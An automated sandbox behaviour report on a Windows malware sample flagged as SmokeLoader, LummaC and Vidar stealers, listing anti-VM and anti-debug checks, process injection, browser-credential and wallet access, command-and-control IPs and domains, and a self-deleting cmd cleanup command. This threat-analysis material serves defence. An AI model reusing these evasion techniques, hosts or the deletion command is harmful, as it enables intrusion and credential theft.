Source: C:\Users\user\Desktop\xvJv1BpknZ.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\Desktop\xvJv1BpknZ.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\Desktop\xvJv1BpknZ.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\AppData\Roaming\etrtabd	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\AppData\Roaming\etrtabd	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\AppData\Roaming\etrtabd	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\AppData\Roaming\etrtabd	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\AppData\Roaming\etrtabd	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\AppData\Roaming\etrtabd	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior

Query firmware table information (likely to detect VMs)

Source: C:\Users\user\AppData\Local\Temp\5876.exe

System information queried: FirmwareTableInformation

Jump to behavior

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Source: katDDA4.tmp, 0000000C.00000002.2532896243.0000000000422000.00000040.00000400.00020000.00000000.sdmp

Binary or memory string: AHAL9THJOHNDOEAVGHOOKX.DLLAVGHOOKA.DLLSNXHK.DLLSBIEDLL.DLLAPI_LOG.DLLDIR_WATCH.DLLPSTOREC.DLLVMCHECK.DLLWPESPY.DLLCMDVRT32.DLLCMDVRT64.DLL

Contains functionality for execution timing, often used to detect debuggers

Source: C:\Users\user\AppData\Local\Temp\5876.exe

Code function: 7_2_007A2D2F rdtsc

7_2_007A2D2F

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Source: C:\Windows\explorer.exe	Window / User API: threadDelayed 481	Jump to behavior
Source: C:\Windows\explorer.exe	Window / User API: threadDelayed 1153	Jump to behavior
Source: C:\Windows\explorer.exe	Window / User API: threadDelayed 774	Jump to behavior
Source: C:\Windows\explorer.exe	Window / User API: threadDelayed 351	Jump to behavior
Source: C:\Windows\explorer.exe	Window / User API: threadDelayed 377	Jump to behavior
Source: C:\Windows\explorer.exe	Window / User API: threadDelayed 3695	Jump to behavior
Source: C:\Windows\explorer.exe	Window / User API: foregroundWindowGot 875	Jump to behavior
Source: C:\Windows\explorer.exe	Window / User API: foregroundWindowGot 880	Jump to behavior

Found dropped PE file which has not been started or loaded

Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\freebl3[1].dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\vcruntime140[1].dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp	Dropped PE file which has not been started: C:\ProgramData\FBGIDHCAAKEB\nss3.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\softokn3[1].dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\mozglue[1].dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\msvcp140[1].dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp	Dropped PE file which has not been started: C:\ProgramData\FBGIDHCAAKEB\freebl3.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp	Dropped PE file which has not been started: C:\ProgramData\FBGIDHCAAKEB\softokn3.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\nss3[1].dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\Q4M8ZOMH\sqls[1].dll	Jump to dropped file

May sleep (evasive loops) to hinder dynamic analysis

Source: C:\Windows\explorer.exe TID: 7556	Thread sleep count: 481 > 30	Jump to behavior
Source: C:\Windows\explorer.exe TID: 7564	Thread sleep count: 1153 > 30	Jump to behavior
Source: C:\Windows\explorer.exe TID: 7564	Thread sleep time: -115300s >= -30000s	Jump to behavior
Source: C:\Windows\explorer.exe TID: 7560	Thread sleep count: 774 > 30	Jump to behavior
Source: C:\Windows\explorer.exe TID: 7560	Thread sleep time: -77400s >= -30000s	Jump to behavior
Source: C:\Windows\explorer.exe TID: 7900	Thread sleep count: 351 > 30	Jump to behavior
Source: C:\Windows\explorer.exe TID: 7900	Thread sleep time: -35100s >= -30000s	Jump to behavior
Source: C:\Windows\explorer.exe TID: 7896	Thread sleep count: 299 > 30	Jump to behavior
Source: C:\Windows\explorer.exe TID: 7904	Thread sleep count: 377 > 30	Jump to behavior
Source: C:\Windows\explorer.exe TID: 7904	Thread sleep time: -37700s >= -30000s	Jump to behavior
Source: C:\Windows\explorer.exe TID: 7564	Thread sleep count: 3695 > 30	Jump to behavior
Source: C:\Windows\explorer.exe TID: 7564	Thread sleep time: -369500s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5876.exe TID: 8020	Thread sleep time: -210000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\timeout.exe TID: 4508	Thread sleep count: 54 > 30

Sample execution stops while process was sleeping (likely an evasion)

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp

File Volume queried: C:\ FullSizeInformation

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp

Code function: 12_2_6D0CEBF0 PR_GetNumberOfProcessors,GetSystemInfo,

12_2_6D0CEBF0

Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\	Jump to behavior

Source: 5876.exe, 00000007.00000003.1761083758.0000000002CDE000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: - GDCDYNVMware20,11696494690p
Source: IEBAAF.12.dr	Binary or memory string: ms.portal.azure.comVMware20,11696494690
Source: explorer.exe, 00000002.00000000.1403647144.0000000009330000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}F
Source: IEBAAF.12.dr	Binary or memory string: AMC password management pageVMware20,11696494690
Source: IEBAAF.12.dr	Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696494690p
Source: IEBAAF.12.dr	Binary or memory string: interactivebrokers.comVMware20,11696494690
Source: IEBAAF.12.dr	Binary or memory string: netportal.hdfcbank.comVMware20,11696494690
Source: IEBAAF.12.dr	Binary or memory string: interactivebrokers.co.inVMware20,11696494690d
Source: IEBAAF.12.dr	Binary or memory string: account.microsoft.com/profileVMware20,11696494690u
Source: explorer.exe, 00000002.00000000.1403647144.0000000009255000.00000004.00000001.00020000.00000000.sdmp, 5876.exe, 00000007.00000003.1742482875.00000000007FA000.00000004.00000020.00020000.00000000.sdmp, 5876.exe, 00000007.00000002.2152415430.00000000007F8000.00000004.00000020.00020000.00000000.sdmp, 5876.exe, 00000007.00000002.2152415430.00000000007C9000.00000004.00000020.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000002.2536713004.0000000000949000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: explorer.exe, 00000002.00000000.1403647144.00000000091FB000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f42ef&0&000000
Source: explorer.exe, 00000002.00000000.1403647144.0000000009255000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\4&224F42EF&0&000000
Source: explorer.exe, 00000002.00000000.1403647144.00000000090DA000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWystem32\DriverStore\en\volume.inf_loc
Source: IEBAAF.12.dr	Binary or memory string: tasks.office.comVMware20,11696494690o
Source: IEBAAF.12.dr	Binary or memory string: www.interactivebrokers.co.inVMware20,11696494690~
Source: explorer.exe, 00000002.00000000.1403647144.0000000009255000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: NXTcaVMWare
Source: IEBAAF.12.dr	Binary or memory string: Interactive Brokers - COM.HKVMware20,11696494690
Source: IEBAAF.12.dr	Binary or memory string: global block list test formVMware20,11696494690
Source: 5876.exe, 00000007.00000003.1742482875.00000000007FA000.00000004.00000020.00020000.00000000.sdmp, 5876.exe, 00000007.00000002.2152415430.00000000007F8000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW?n
Source: katDDA4.tmp, 0000000C.00000002.2540474103.00000000076B0000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: VMwareVMware
Source: IEBAAF.12.dr	Binary or memory string: turbotax.intuit.comVMware20,11696494690t
Source: IEBAAF.12.dr	Binary or memory string: bankofamerica.comVMware20,11696494690x
Source: IEBAAF.12.dr	Binary or memory string: Canara Transaction PasswordVMware20,11696494690}
Source: IEBAAF.12.dr	Binary or memory string: Canara Change Transaction PasswordVMware20,11696494690
Source: IEBAAF.12.dr	Binary or memory string: Interactive Brokers - HKVMware20,11696494690]
Source: IEBAAF.12.dr	Binary or memory string: Canara Transaction PasswordVMware20,11696494690x
Source: explorer.exe, 00000002.00000000.1403647144.0000000009330000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: IEBAAF.12.dr	Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696494690
Source: explorer.exe, 00000002.00000000.1399823359.0000000000A20000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: IEBAAF.12.dr	Binary or memory string: secure.bankofamerica.comVMware20,11696494690\|UE
Source: katDDA4.tmp, 0000000C.00000002.2536713004.00000000008CE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW8
Source: IEBAAF.12.dr	Binary or memory string: discord.comVMware20,11696494690f
Source: IEBAAF.12.dr	Binary or memory string: outlook.office.comVMware20,11696494690s
Source: IEBAAF.12.dr	Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696494690
Source: IEBAAF.12.dr	Binary or memory string: Interactive Brokers - EU WestVMware20,11696494690n
Source: explorer.exe, 00000002.00000000.1399823359.0000000000A20000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: VMware SATA CD00=
Source: IEBAAF.12.dr	Binary or memory string: outlook.office365.comVMware20,11696494690t
Source: IEBAAF.12.dr	Binary or memory string: www.interactivebrokers.comVMware20,11696494690}
Source: IEBAAF.12.dr	Binary or memory string: microsoft.visualstudio.comVMware20,11696494690x
Source: explorer.exe, 00000002.00000000.1403647144.00000000090DA000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: IEBAAF.12.dr	Binary or memory string: Canara Change Transaction PasswordVMware20,11696494690^
Source: IEBAAF.12.dr	Binary or memory string: Test URL for global passwords blocklistVMware20,11696494690
Source: IEBAAF.12.dr	Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696494690z
Source: IEBAAF.12.dr	Binary or memory string: trackpan.utiitsl.comVMware20,11696494690h
Source: explorer.exe, 00000002.00000000.1399823359.0000000000A20000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000
Source: IEBAAF.12.dr	Binary or memory string: dev.azure.comVMware20,11696494690j
Source: katDDA4.tmp, 0000000C.00000002.2540474103.00000000076B0000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: VMwareVMwareoItL
Source: explorer.exe, 00000002.00000000.1399823359.0000000000A20000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000

Source: C:\Users\user\Desktop\xvJv1BpknZ.exe

System information queried: ModuleInformation

Jump to behavior

Source: C:\Users\user\Desktop\xvJv1BpknZ.exe

Process information queried: ProcessInformation

Jump to behavior

Anti Debugging

Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation))

Source: C:\Users\user\Desktop\xvJv1BpknZ.exe	System information queried: CodeIntegrityInformation			Jump to behavior
Source: C:\Users\user\AppData\Roaming\etrtabd	System information queried: CodeIntegrityInformation			Jump to behavior

Checks if the current process is being debugged

Source: C:\Users\user\Desktop\xvJv1BpknZ.exe	Process queried: DebugPort			Jump to behavior
Source: C:\Users\user\AppData\Roaming\etrtabd	Process queried: DebugPort			Jump to behavior

Contains functionality for execution timing, often used to detect debuggers

Source: C:\Users\user\AppData\Local\Temp\5876.exe

Code function: 7_2_007A2D2F rdtsc

7_2_007A2D2F

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Source: C:\Users\user\Desktop\xvJv1BpknZ.exe

Code function: 0_2_00403406 LdrLoadDll,ExpandEnvironmentStringsW,CreateFileW,CreateFileMappingW,MapViewOfFile,

0_2_00403406

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp

Code function: 12_2_6D19AC62 IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

12_2_6D19AC62

Contains functionality to read the PEB

Source: C:\Users\user\Desktop\xvJv1BpknZ.exe	Code function: 0_2_0211092B mov eax, dword ptr fs:[00000030h]	0_2_0211092B
Source: C:\Users\user\Desktop\xvJv1BpknZ.exe	Code function: 0_2_02110D90 mov eax, dword ptr fs:[00000030h]	0_2_02110D90
Source: C:\Users\user\Desktop\xvJv1BpknZ.exe	Code function: 0_2_02155A27 push dword ptr fs:[00000030h]	0_2_02155A27
Source: C:\Users\user\AppData\Roaming\etrtabd	Code function: 6_2_020C092B mov eax, dword ptr fs:[00000030h]	6_2_020C092B
Source: C:\Users\user\AppData\Roaming\etrtabd	Code function: 6_2_020C0D90 mov eax, dword ptr fs:[00000030h]	6_2_020C0D90
Source: C:\Users\user\AppData\Roaming\etrtabd	Code function: 6_2_02205FC7 push dword ptr fs:[00000030h]	6_2_02205FC7
Source: C:\Users\user\AppData\Local\Temp\5876.exe	Code function: 7_2_0079DAB3 push dword ptr fs:[00000030h]	7_2_0079DAB3
Source: C:\Users\user\AppData\Local\Temp\5876.exe	Code function: 7_2_0212092B mov eax, dword ptr fs:[00000030h]	7_2_0212092B
Source: C:\Users\user\AppData\Local\Temp\5876.exe	Code function: 7_2_02120D90 mov eax, dword ptr fs:[00000030h]	7_2_02120D90

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Source: C:\Users\user\Desktop\xvJv1BpknZ.exe

Code function: 0_2_0040BD58 LocalReAlloc,InterlockedExchange,RtlDeleteCriticalSection,InitAtomTable,WriteConsoleOutputA,ReadFileScatter,GetModuleFileNameW,RaiseException,RtlInterlockedPopEntrySList,FileTimeToSystemTime,SetCalendarInfoA,SetConsoleMode,GetFileAttributesW,CompareStringW,ActivateActCtx,LoadLibraryA,EnumTimeFormatsW,GetProcessHeaps,

0_2_0040BD58

Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp

Code function: 12_2_6D19AC62 IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

12_2_6D19AC62

HIPS / PFW / Operating System Protection Evasion

Benign windows process drops PE files

Source: C:\Windows\explorer.exe

File created: EE6.exe.2.dr

Jump to dropped file

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\explorer.exe	Network Connect: 109.175.29.39 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 190.13.174.94 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 91.202.233.231 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 23.145.40.124 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 190.147.128.172 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 45.129.96.86 80	Jump to behavior

Yara detected Powershell download and execute

Source: Yara match

File source: Process Memory Space: EE6.exe PID: 1640, type: MEMORYSTR

Allocates memory in foreign processes

Source: C:\Users\user\AppData\Local\Temp\EE6.exe

Memory allocated: C:\Users\user\AppData\Local\Temp\katDDA4.tmp base: 400000 protect: page execute and read and write

Jump to behavior

Contains functionality to inject code into remote processes

Source: C:\Users\user\AppData\Local\Temp\EE6.exe

Code function: 11_2_0427A4F0 NtAllocateVirtualMemory,GetTempFileNameA,CreateFileA,WriteFile,CreateProcessA,NtUnmapViewOfSection,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,Wow64GetThreadContext,Wow64SetThreadContext,ResumeThread,ExitProcess,

11_2_0427A4F0

Creates a thread in another existing process (thread injection)

Source: C:\Users\user\Desktop\xvJv1BpknZ.exe	Thread created: C:\Windows\explorer.exe EIP: 89B19E0			Jump to behavior
Source: C:\Users\user\AppData\Roaming\etrtabd	Thread created: unknown EIP: 8BD19E0			Jump to behavior

Injects a PE file into a foreign processes

Source: C:\Users\user\AppData\Local\Temp\EE6.exe

Memory written: C:\Users\user\AppData\Local\Temp\katDDA4.tmp base: 400000 value starts with: 4D5A

Jump to behavior

LummaC encrypted strings found

Source: 5876.exe	String found in binary or memory: zippyfinickysofwps.shop
Source: 5876.exe	String found in binary or memory: obsceneclassyjuwks.shop
Source: 5876.exe	String found in binary or memory: acceptabledcooeprs.shop
Source: 5876.exe	String found in binary or memory: whispedwoodmoodsksl.shop
Source: 5876.exe	String found in binary or memory: boredimperissvieos.shop
Source: 5876.exe	String found in binary or memory: holicisticscrarws.shop
Source: 5876.exe	String found in binary or memory: sweetsquarediaslw.shop
Source: 5876.exe	String found in binary or memory: plaintediousidowsko.shop
Source: 5876.exe	String found in binary or memory: miniaturefinerninewjs.shop

Maps a DLL or memory area into another process

Source: C:\Users\user\Desktop\xvJv1BpknZ.exe	Section loaded: NULL target: C:\Windows\explorer.exe protection: read write	Jump to behavior
Source: C:\Users\user\Desktop\xvJv1BpknZ.exe	Section loaded: NULL target: C:\Windows\explorer.exe protection: execute and read	Jump to behavior
Source: C:\Users\user\AppData\Roaming\etrtabd	Section loaded: NULL target: C:\Windows\explorer.exe protection: read write	Jump to behavior
Source: C:\Users\user\AppData\Roaming\etrtabd	Section loaded: NULL target: C:\Windows\explorer.exe protection: execute and read	Jump to behavior

Sample uses process hollowing technique

Source: C:\Users\user\AppData\Local\Temp\EE6.exe

Section unmapped: C:\Users\user\AppData\Local\Temp\katDDA4.tmp base address: 400000

Jump to behavior

Writes to foreign memory regions

Source: C:\Users\user\AppData\Local\Temp\EE6.exe	Memory written: C:\Users\user\AppData\Local\Temp\katDDA4.tmp base: 400000	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EE6.exe	Memory written: C:\Users\user\AppData\Local\Temp\katDDA4.tmp base: 401000	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EE6.exe	Memory written: C:\Users\user\AppData\Local\Temp\katDDA4.tmp base: 422000	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EE6.exe	Memory written: C:\Users\user\AppData\Local\Temp\katDDA4.tmp base: 42E000	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EE6.exe	Memory written: C:\Users\user\AppData\Local\Temp\katDDA4.tmp base: 641000	Jump to behavior

Creates a process in suspended mode (likely to inject code)

Source: C:\Users\user\AppData\Local\Temp\EE6.exe	Process created: C:\Users\user\AppData\Local\Temp\katDDA4.tmp C:\Users\user\AppData\Local\Temp\katDDA4.tmp	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c timeout /t 10 & del /f /q "C:\Users\user\AppData\Local\Temp\katDDA4.tmp" & rd /s /q "C:\ProgramData\FBGIDHCAAKEB" & exit	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 10

Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp

Code function: 12_2_6D1E4760 malloc,InitializeSecurityDescriptor,SetSecurityDescriptorOwner,SetSecurityDescriptorGroup,GetLengthSid,GetLengthSid,GetLengthSid,malloc,InitializeAcl,AddAccessAllowedAce,AddAccessAllowedAce,AddAccessAllowedAce,SetSecurityDescriptorDacl,PR_SetError,GetLastError,free,GetLastError,GetLastError,free,free,free,

12_2_6D1E4760

Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp

Code function: 12_2_6D0C1C30 GetCurrentProcess,OpenProcessToken,GetTokenInformation,GetLengthSid,malloc,CopySid,CopySid,GetTokenInformation,GetLengthSid,malloc,CopySid,CloseHandle,AllocateAndInitializeSid,GetLastError,PR_LogPrint,

12_2_6D0C1C30

Source: explorer.exe, 00000002.00000000.1401510441.00000000044D0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1400141858.0000000001090000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000002.00000000.1403647144.000000000936E000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 00000002.00000000.1400141858.0000000001090000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000002.00000000.1399823359.0000000000A20000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Progman
Source: explorer.exe, 00000002.00000000.1400141858.0000000001090000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: 0Program Manager
Source: explorer.exe, 00000002.00000000.1400141858.0000000001090000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progmanlock
Source: explorer.exe, 00000002.00000000.1403647144.000000000936E000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: Shell_TrayWnd]1Q

Contains functionality to query CPU information (cpuid)

Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp

Code function: 12_2_6D19AE71 cpuid

12_2_6D19AE71

Contains functionality to query locales information (e.g. system language)

Source: C:\Users\user\Desktop\xvJv1BpknZ.exe	Code function: GetLocaleInfoA,		0_2_0040B534
Source: C:\Users\user\AppData\Roaming\etrtabd	Code function: GetLocaleInfoA,		6_2_0040B534

Queries information about the installed CPU (vendor, model number etc)

Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0			Jump to behavior

Queries the volume information (name, serial number etc) of a device

Source: C:\Users\user\AppData\Local\Temp\5876.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5876.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5876.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5876.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5876.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5876.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5876.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp	Queries volume information: C:\ VolumeInformation	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp

Code function: 12_2_6D19A8DC GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,

12_2_6D19A8DC

Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp

Code function: 12_2_6D0E8390 NSS_GetVersion,

12_2_6D0E8390

Source: C:\Users\user\AppData\Local\Temp\5876.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

AV process strings found (often used to terminate AV products)

Source: 5876.exe, 00000007.00000003.2058603010.000000000085C000.00000004.00000020.00020000.00000000.sdmp, 5876.exe, 00000007.00000003.2058443269.0000000002D2E000.00000004.00000800.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000002.2536713004.0000000000929000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Source: C:\Users\user\AppData\Local\Temp\5876.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * From AntiVirusProduct

Stealing of Sensitive Information

Yara detected CryptOne packer

Source: Yara match

File source: 0000000B.00000002.2056003216.0000000004279000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY

Yara detected LummaC Stealer

Source: Yara match	File source: decrypted.memstr, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: 5876.exe PID: 7992, type: MEMORYSTR
Source: Yara match	File source: sslproxydump.pcap, type: PCAP

Yara detected SmokeLoader

Source: Yara match	File source: 00000006.00000002.1650939985.00000000021E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.1651356917.0000000002441000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1419307805.0000000002120000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1419568302.0000000003C01000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY

Yara detected Vidar

Source: Yara match

File source: sslproxydump.pcap, type: PCAP

Yara detected Vidar stealer

Source: Yara match	File source: 11.2.EE6.exe.4470000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.EE6.exe.4247719.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.EE6.exe.44b0000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.EE6.exe.4247719.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.EE6.exe.4470000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.EE6.exe.44b0000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000C.00000002.2536713004.0000000000929000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.2056487759.00000000044B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.2056395871.0000000004470000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
